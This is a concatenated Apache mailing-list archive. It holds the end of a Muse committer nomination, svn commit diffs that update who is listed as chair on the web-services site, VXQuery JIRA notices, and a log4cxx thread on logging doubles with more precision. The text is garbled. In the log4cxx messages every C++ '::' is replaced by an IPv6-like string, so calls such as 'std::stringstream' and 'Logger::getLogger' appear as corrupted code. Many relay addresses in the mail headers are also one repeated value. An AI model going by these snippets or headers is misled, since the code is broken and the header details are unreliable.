code, but unfortunately, the current committers have = been pulled away to other projects. I think that it's time to nominate = some new committers, people who have shown that they can maintain and g= row the Muse code base through their code contributions and time volunt= eered helping others on the mailing list.<br> <br> Below is the list of people that I am nominating to take on the respons= ibility of shaping, testing, and delivering Muse 2.3.0; they will be jo= ined by existing committers Vinh Nguyen (Cisco) and Joel Hawkins (Compu= ware).<br> <br> <br> Saurabh Dravid - Saurabh initially worked on the Eclipse TPTP project, = building Eclipse tooling for Muse users. Much of his bug reporting (and= solving) is split between Apache and Eclipse bug trackers, but togethe= r these two sources show that he is very comfortable getting knee deep = in the code and solving problems. With that knowledge under his belt, S= aurabh is now contributing new features around security and resource di= scovery, things that are crucial to deployers and could not be complete= d without lots of intense study and determination.<br> <br> Balan Subramanian - Everything I said about Saurabh can be applied equa= lly to Balan. Balan has also spent years handling the legal and adminis= trative issues surrounding open source development with Apache and Ecli= pse (from a corporate perspective), and is well-suited to review new co= ntributions and ensure that due diligence is in place for all of them; = the 2.3 contributions come from sources that are more disparate than ev= er, so this skill and patience is important.<br> <br> Chris Twiner - Chris Twiner is a 'real world' user of Muse who has foun= d and cracked many tough problems in the code base. In my personal opin= ion, his contributions on MUSE-270[1] alone are enough to warrant nomin= ation, but his involvement is not limited to this. In addition to being= a significant code contributor, Chris is an active mailing list proble= m solver who often has insight that the original developers could not h= ave had when they first wrote the code; he has also shown the tact and = resourcefulness that I think is required to balance the needs of new us= ers with the desire of developers to move forward.<br> <br> Kam Yee - Kam has made strong contributions in an area that is extremel= y important but often overlooked because of its difficulty: he has crea= ted a test harness for Muse FVT and SVT, including WS-* spec compliance= . This is something that we've wanted for a very long time, but the com= plexity of WS-* deployment and testing has pushed it to the bottom of t= he list. I think Kam's work will be key to ensuring that we don't have = regressions in spec compliance or in the tedious-but-important WSDL/SOA= P/codegen issues that we face all the time.<br> <br> <br> Committers and PMC members: please reply to muse-dev and general with y= our votes. You can either send one vote for all or vote for each indivi= dual separately. <br> <br> Here is my +1 for all four nominees.<br> <br> Thanks,<br> Dan<br> <br> <br> [1] <a href=3D"http://issues.apache.org/jira/browse/MUSE-270">http://is= sues.apache.org/jira/browse/MUSE-270</a><br> </body></html>= --0__=08BBFEA1DFDA50738f9e8a93df938690918c08BBFEA1DFDA5073-- From [email protected] Fri Apr 25 13:58:15 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66225 invoked from network); 25 Apr 2008 13:58:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 13:58:12 -0000 Received: (qmail 72279 invoked by uid 500); 25 Apr 2008 13:58:13 -0000 Delivered-To: [email protected] Received: (qmail 71709 invoked by uid 500); 25 Apr 2008 13:58:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 71698 invoked by uid 500); 25 Apr 2008 13:58:11 -0000 Delivered-To: [email protected] Received: (qmail 71695 invoked by uid 99); 25 Apr 2008 13:58:11 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 06:58:11 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 13:57:35 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 059621A9832; Fri, 25 Apr 2008 06:57:49 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r651608 - /webservices/site/trunk/src/documentation/content/xdocs/index.xml Date: Fri, 25 Apr 2008 13:57:48 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gdaniels Date: Fri Apr 25 06:57:48 2008 New Revision: 651608 URL: http://svn.apache.org/viewvc?rev=651608&view=rev Log: Woops - chair was out of date on web page Modified: webservices/site/trunk/src/documentation/content/xdocs/index.xml Modified: webservices/site/trunk/src/documentation/content/xdocs/index.xml URL: http://svn.apache.org/viewvc/webservices/site/trunk/src/documentation/content/xdocs/index.xml?rev=651608&r1=651607&r2=651608&view=diff ============================================================================== --- webservices/site/trunk/src/documentation/content/xdocs/index.xml (original) +++ webservices/site/trunk/src/documentation/content/xdocs/index.xml Fri Apr 25 06:57:48 2008 @@ -54,7 +54,7 @@ <li>Samisa Abeysinghe</li> <li>David Chappell</li> <li><a href="http://ws.apache.org/~chinthaka/">Eran Chinthaka</a></li> - <li>Glen Daniels</li> + <li>Glen Daniels (current chair)</li> <li>Jaliya Ekanayake</li> <li>Anthony Elder</li> <li>Paul Fremantle</li> @@ -77,7 +77,7 @@ <li>Aleksander Slominski</li> <li>James Snell</li> <li>Ian Springer</li> - <li><a href="http://ws.apache.org/~dims/">Davanum Srinivas</a> (Current Chair)</li> + <li><a href="http://ws.apache.org/~dims/">Davanum Srinivas</a></li> <li><a href="http://ws.apache.org/~deepal/">Deepal Jayasinghe</a></li> <li>Ruchith Fernando</li> <li>Ajith Ranabahu</li> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Apr 25 14:30:01 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88852 invoked from network); 25 Apr 2008 14:29:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Apr 2008 14:29:57 -0000 Received: (qmail 47767 invoked by uid 500); 25 Apr 2008 14:29:59 -0000 Delivered-To: [email protected] Received: (qmail 47185 invoked by uid 500); 25 Apr 2008 14:29:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47174 invoked by uid 500); 25 Apr 2008 14:29:57 -0000 Delivered-To: [email protected] Received: (qmail 47171 invoked by uid 99); 25 Apr 2008 14:29:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 07:29:57 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 25 Apr 2008 14:29:11 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1B7791A9832; Fri, 25 Apr 2008 07:29:32 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r651617 - in /webservices/site/trunk/targets: index.html skin/basic.css skin/print.css skin/profile.css skin/screen.css Date: Fri, 25 Apr 2008 14:29:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: gdaniels Date: Fri Apr 25 07:29:28 2008 New Revision: 651617 URL: http://svn.apache.org/viewvc?rev=651617&view=rev Log: (empty) Modified: webservices/site/trunk/targets/index.html webservices/site/trunk/targets/skin/basic.css webservices/site/trunk/targets/skin/print.css webservices/site/trunk/targets/skin/profile.css webservices/site/trunk/targets/skin/screen.css Modified: webservices/site/trunk/targets/index.html URL: http://svn.apache.org/viewvc/webservices/site/trunk/targets/index.html?rev=651617&r1=651616&r2=651617&view=diff ============================================================================== --- webservices/site/trunk/targets/index.html (original) +++ webservices/site/trunk/targets/index.html Fri Apr 25 07:29:28 2008 @@ -326,7 +326,7 @@ <a href="http://ws.apache.org/~chinthaka/">Eran Chinthaka</a> </li> -<li>Glen Daniels</li> +<li>Glen Daniels (current chair)</li> <li>Jaliya Ekanayake</li> @@ -373,7 +373,8 @@ <li>Ian Springer</li> <li> -<a href="http://ws.apache.org/~dims/">Davanum Srinivas</a> (Current Chair)</li> +<a href="http://ws.apache.org/~dims/">Davanum Srinivas</a> +</li> <li> <a href="http://ws.apache.org/~deepal/">Deepal Jayasinghe</a> @@ -398,7 +399,7 @@ </p> </div> -<a name="N10108"></a><a name="Wiki"></a> +<a name="N10107"></a><a name="Wiki"></a> <h2 class="boxed">Wiki</h2> <div class="section"> <p> @@ -406,7 +407,7 @@ </p> </div> -<a name="N10116"></a><a name="IRC"></a> +<a name="N10115"></a><a name="IRC"></a> <h2 class="boxed">IRC</h2> <div class="section"> <p> @@ -414,7 +415,7 @@ </p> </div> -<a name="N10128"></a><a name="Blog"></a> +<a name="N10127"></a><a name="Blog"></a> <h2 class="boxed">Blog</h2> <div class="section"> <p> Modified: webservices/site/trunk/targets/skin/basic.css URL: http://svn.apache.org/viewvc/webservices/site/trunk/targets/skin/basic.css?rev=651617&r1=651616&r2=651617&view=diff ============================================================================== --- webservices/site/trunk/targets/skin/basic.css (original) +++ webservices/site/trunk/targets/skin/basic.css Fri Apr 25 07:29:28 2008 @@ -163,4 +163,4 @@ .codefrag { font-family: "Courier New", Courier, monospace; font-size: 110%; -} +} \ No newline at end of file Modified: webservices/site/trunk/targets/skin/print.css URL: http://svn.apache.org/viewvc/webservices/site/trunk/targets/skin/print.css?rev=651617&r1=651616&r2=651617&view=diff ============================================================================== --- webservices/site/trunk/targets/skin/print.css (original) +++ webservices/site/trunk/targets/skin/print.css Fri Apr 25 07:29:28 2008 @@ -51,4 +51,4 @@ acronym { border: 0; -} +} \ No newline at end of file Modified: webservices/site/trunk/targets/skin/profile.css URL: http://svn.apache.org/viewvc/webservices/site/trunk/targets/skin/profile.css?rev=651617&r1=651616&r2=651617&view=diff ============================================================================== --- webservices/site/trunk/targets/skin/profile.css (original) +++ webservices/site/trunk/targets/skin/profile.css Fri Apr 25 07:29:28 2008 @@ -158,4 +158,4 @@ #footer a { color: #0F3660; } #footer a:visited { color: #009999; } - + \ No newline at end of file Modified: webservices/site/trunk/targets/skin/screen.css URL: http://svn.apache.org/viewvc/webservices/site/trunk/targets/skin/screen.css?rev=651617&r1=651616&r2=651617&view=diff ============================================================================== --- webservices/site/trunk/targets/skin/screen.css (original) +++ webservices/site/trunk/targets/skin/screen.css Fri Apr 25 07:29:28 2008 @@ -584,4 +584,4 @@ list-style-image: url('../images/instruction_arrow.png'); list-style-position: outside; margin-left: 2em; -} +} \ No newline at end of file --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Tue Jul 21 07:11:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91717 invoked from network); 21 Jul 2009 07:11:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 07:11:21 -0000 Received: (qmail 59167 invoked by uid 500); 21 Jul 2009 07:12:26 -0000 Delivered-To: [email protected] Received: (qmail 59158 invoked by uid 500); 21 Jul 2009 07:12:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vxquery-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 58698 invoked by uid 99); 21 Jul 2009 07:11:39 -0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Message-ID: <1293628156.1248160275382.JavaMail.jira@brutus> Date: Tue, 21 Jul 2009 00:11:15 -0700 (PDT) From: "Paul Fremantle (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Reopened: (VXQUERY-15) Enable notifications from JIRA to mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/VXQUERY-15?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Paul Fremantle reopened VXQUERY-15: ----------------------------------- Should be vxquery-dev > Enable notifications from JIRA to mailing lists > ----------------------------------------------- > > Key: VXQUERY-15 > URL: https://issues.apache.org/jira/browse/VXQUERY-15 > Project: VXQuery > Issue Type: Sub-task > Reporter: Paul Fremantle > Assignee: Paul Fremantle > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 21 07:12:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91819 invoked from network); 21 Jul 2009 07:12:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 07:12:31 -0000 Received: (qmail 59352 invoked by uid 500); 21 Jul 2009 07:13:37 -0000 Delivered-To: [email protected] Received: (qmail 59344 invoked by uid 500); 21 Jul 2009 07:13:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vxquery-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59334 invoked by uid 99); 21 Jul 2009 07:13:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 07:13:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 07:13:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DDCF0234C044 for <[email protected]>; Tue, 21 Jul 2009 00:13:14 -0700 (PDT) Message-ID: <1649820351.1248160394904.JavaMail.jira@brutus> Date: Tue, 21 Jul 2009 00:13:14 -0700 (PDT) From: "Paul Fremantle (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (VXQUERY-7) Submission of CCLAs from involved corporations MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/VXQUERY-7?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12733518#action_12733518 ] Paul Fremantle commented on VXQUERY-7: -------------------------------------- Till is checking. > Submission of CCLAs from involved corporations > ---------------------------------------------- > > Key: VXQUERY-7 > URL: https://issues.apache.org/jira/browse/VXQUERY-7 > Project: VXQuery > Issue Type: Sub-task > Reporter: Paul Fremantle > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jul 21 07:12:52 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91842 invoked from network); 21 Jul 2009 07:12:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 07:12:52 -0000 Received: (qmail 59397 invoked by uid 500); 21 Jul 2009 07:13:57 -0000 Delivered-To: [email protected] Received: (qmail 59386 invoked by uid 500); 21 Jul 2009 07:13:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vxquery-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 58677 invoked by uid 99); 21 Jul 2009 07:11:37 -0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Message-ID: <878940220.1248160275444.JavaMail.jira@brutus> Date: Tue, 21 Jul 2009 00:11:15 -0700 (PDT) From: "Paul Fremantle (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (VXQUERY-15) Enable notifications from JIRA to mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/VXQUERY-15?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Paul Fremantle closed VXQUERY-15. --------------------------------- Resolution: Fixed Fixed to notify vxquery-dev > Enable notifications from JIRA to mailing lists > ----------------------------------------------- > > Key: VXQUERY-15 > URL: https://issues.apache.org/jira/browse/VXQUERY-15 > Project: VXQuery > Issue Type: Sub-task > Reporter: Paul Fremantle > Assignee: Paul Fremantle > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
From [email protected] Tue Jan 04 04:03:00 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16502 invoked from network); 4 Jan 2011 04:03:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jan 2011 04:03:00 -0000 Received: (qmail 56872 invoked by uid 500); 4 Jan 2011 04:03:00 -0000 Delivered-To: [email protected] Received: (qmail 56753 invoked by uid 500); 4 Jan 2011 04:02:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 56745 invoked by uid 99); 4 Jan 2011 04:02:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Jan 2011 04:02:57 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RFC_ABUSE_POST,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Jan 2011 04:02:49 +0000 Received: by iyj18 with SMTP id 18so12881592iyj.34 for <[email protected]>; Mon, 03 Jan 2011 20:02:28 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=Eolv4g8/YTETy/wzsHn6fsCsUjlHUMx6Q6lm5n0BWPs=; b=wxUCjAtFTiQibRr+BVDFtEBtKReVU5FJMxosqmViwSYL+xgC8218QoV94VD62xYlp/ 7wJcZjHzPhV/7aZDdPBgSHfkJCaHGMxKMTTH0sBfXTJFbUjx98rY+WGbvwl6G0svhvET bhExFFdYI2pkZMytkD+F/d5NMncxpsottlNxY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=JdGspTSnxHT0uuUNdy9lTc1116APaevimLt/jG7eepNZUjGttYUZC8hgnsNpWMkyTZ pj9zCLoMRl3RdkRBk+Oa+pPM2pq3Bsh6QxbLMnQvC7q+YmMYL9Z5zX5WWdRy/jzqR69j vp9wIGbrA1OTkNiFzPgHgIdwjOxRNx15t0jDY= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id bt1mr21588568icb.252.1294113748604; Mon, 03 Jan 2011 20:02:28 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 3 Jan 2011 20:02:28 -0800 (PST) Date: Mon, 3 Jan 2011 22:02:28 -0600 Message-ID: <[email protected]> Subject: double precision From: Matthew Bingham <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=90e6ba6e81d848d94c0498fd56e3 X-Virus-Checked: Checked by ClamAV on apache.org --90e6ba6e81d848d94c0498fd56e3 Content-Type: text/plain; charset=ISO-8859-1 I cannot seem to find an answer to this anywhere. How can I increase decimal precision when logging? Something like stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision(). Is there a way to do it from the xml configuration file? Thanks --90e6ba6e81d848d94c0498fd56e3 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable I cannot seem to find an answer to this anywhere.=A0 How can I increase dec= imal precision when logging? =A0 Something like stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecisio= n().=A0 Is there a way to do it from the xml configuration file?<br><br>Tha= nks --90e6ba6e81d848d94c0498fd56e3-- From [email protected] Tue Jan 04 20:06:17 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57702 invoked from network); 4 Jan 2011 20:06:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jan 2011 20:06:17 -0000 Received: (qmail 80424 invoked by uid 500); 4 Jan 2011 20:06:17 -0000 Delivered-To: [email protected] Received: (qmail 79813 invoked by uid 500); 4 Jan 2011 20:06:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79719 invoked by uid 99); 4 Jan 2011 20:06:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Jan 2011 20:06:15 +0000 X-ASF-Spam-Status: No, hits=-5.0 required=10.0 tests=RCVD_IN_RP_CERTIFIED,RCVD_IN_RP_SAFE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp-gsi.geckosoftware.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Jan 2011 20:06:08 +0000 Received: from [161.129.204.104] (office-net.geckosoftware.com [161.129.204.104]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by detroit.geckosoftware.com (Postfix) with ESMTPSA id A83C114A498 for <[email protected]>; Tue, 4 Jan 2011 12:57:42 -0700 (MST) Message-ID: <[email protected]> Date: Tue, 04 Jan 2011 13:05:47 -0700 From: "Jacob L. Anawalt" <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:161.129.204.104) Gecko/20101027 Lightning/1.0b2 Thunderbird/3.1.6 MIME-Version: 1.0 To: Log4CXX User <[email protected]> Subject: Re: double precision References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org On 1/3/2011 9:02 PM, Matthew Bingham wrote: > I cannot seem to find an answer to this anywhere. How can I increase > decimal precision when logging? Something like > stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision(). Is there a way to do it from the xml > configuration file? > Increase the precision of what? Your application supplied message (%m)? An example of a log source line and the current and wanted output would reduce guessing. If it's your user supplied message, it's a string type by the time it hits the Logger so changing the precision would need to be done in the application code. -- Jacob Anawalt Gecko Software, Inc. [email protected] +1-620-806-9604 From [email protected] Fri Jan 07 13:03:05 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55924 invoked from network); 7 Jan 2011 13:03:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jan 2011 13:03:05 -0000 Received: (qmail 99048 invoked by uid 500); 7 Jan 2011 13:03:05 -0000 Delivered-To: [email protected] Received: (qmail 98862 invoked by uid 500); 7 Jan 2011 13:03:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 98854 invoked by uid 99); 7 Jan 2011 13:03:02 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 13:03:02 +0000 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,RFC_ABUSE_POST,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Jan 2011 13:02:56 +0000 Received: by iwn8 with SMTP id 8so17047032iwn.34 for <[email protected]>; Fri, 07 Jan 2011 05:02:35 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=9N2YZDLXv+qRVnXVKC5JRs+/RSsRMEjszmFfB6FBN2A=; b=TTVdxZZuWC2uUFVA3Ru5xsqzzTaJ1quVWBI+6zzUvR1ty+AiLJbwcVgDZGwyg1J7mj 7pCifpwAgbBiEVV73n/xALf/B1q1GjBVe83RQNEMVNW7793x7dsYQZgTdtefj8y8FttK 8KuXj6xr3aa64uR1XRq01lm13P8jjzH6KG7uc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=FQSripASYrvfchK4DDwVcQUiIBHipBWD8GeUYCd/WLhdl85acZ9dhNc0GTdh17ykY5 hw2nP0QQlsION00zRSSpbiCcZ+hP+fDLrmYuloyIdNhhVTN6EQfV4gE9H30jVWlCC3wB lkkaW9kyKHxtOQmoTz4IVDhV1uqD0wh0W+kfs= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id bg1mr821078icb.118.1294405355774; Fri, 07 Jan 2011 05:02:35 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 7 Jan 2011 05:02:35 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 7 Jan 2011 07:02:35 -0600 Message-ID: <[email protected]> Subject: Re: double precision From: Matthew Bingham <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=90e6ba6e83b26d24b60499413b39 --90e6ba6e83b26d24b60499413b39 Content-Type: text/plain; charset=ISO-8859-1 Sorry for not being more specific. If I use the following code with the log4cxx.xml set to use a FileAppender: DOMConfiguratoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfigure("log4cxx.xml"); logger_ = Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("TestApp"); double tmp = 100.12345; LOG4CXX_DEBUG(logger_,"value is "<<tmp); The string in the log file is "DEBUG TestApp- value is 100.123" The value of the variable was 100.12345 but only 100.123 was logged. How can I log the extra decimal places? I know one way is to use stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream, set its precision, build the string myself, then pass it into log4cxx. However, I am concerned about performance and would hate to build the string only for it not to be logged because it is only a DEBUG log and need atleast INFO to log. On Mon, Jan 3, 2011 at 10:02 PM, Matthew Bingham <[email protected]>wrote: > I cannot seem to find an answer to this anywhere. How can I increase > decimal precision when logging? Something like > stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bprecision(). Is there a way to do it from the xml > configuration file? > > Thanks --90e6ba6e83b26d24b60499413b39 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sorry for not being more specific.=A0 If I use the following code with the = log4cxx.xml set to use a FileAppender:<br><br>DOMConfiguratoracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bonfigure(&q= uot;log4cxx.xml&quot;);<br>logger_ =3D Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger(&quot;TestApp&quot= ;);<br> =A0<br>double tmp =3D 100.12345;<br>LOG4CXX_DEBUG(logger_,&quot;value is &q= uot;&lt;&lt;tmp);<br><br>The string in the log file is <br>&quot;DEBUG Test= App- value is 100.123&quot;<br><br>The value of the variable was 100.12345 = but only 100.123 was logged.=A0 How can I log the extra decimal places?<br> <br>I know one way is to use stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream, set its precision, build t= he string myself, then pass it into log4cxx.=A0 However, I am concerned abo= ut performance and would hate to build the string only for it not to be log= ged because it is only a DEBUG log and need atleast INFO to log.<br> <br><br><div class=3D"gmail_quote">On Mon, Jan 3, 2011 at 10:02 PM, Matthew= Bingham <span dir=3D"ltr">&lt;<a href=3D"mailto:[email protected]">texb= [email protected]</a>&gt;</span> wrote:<br><blockquote 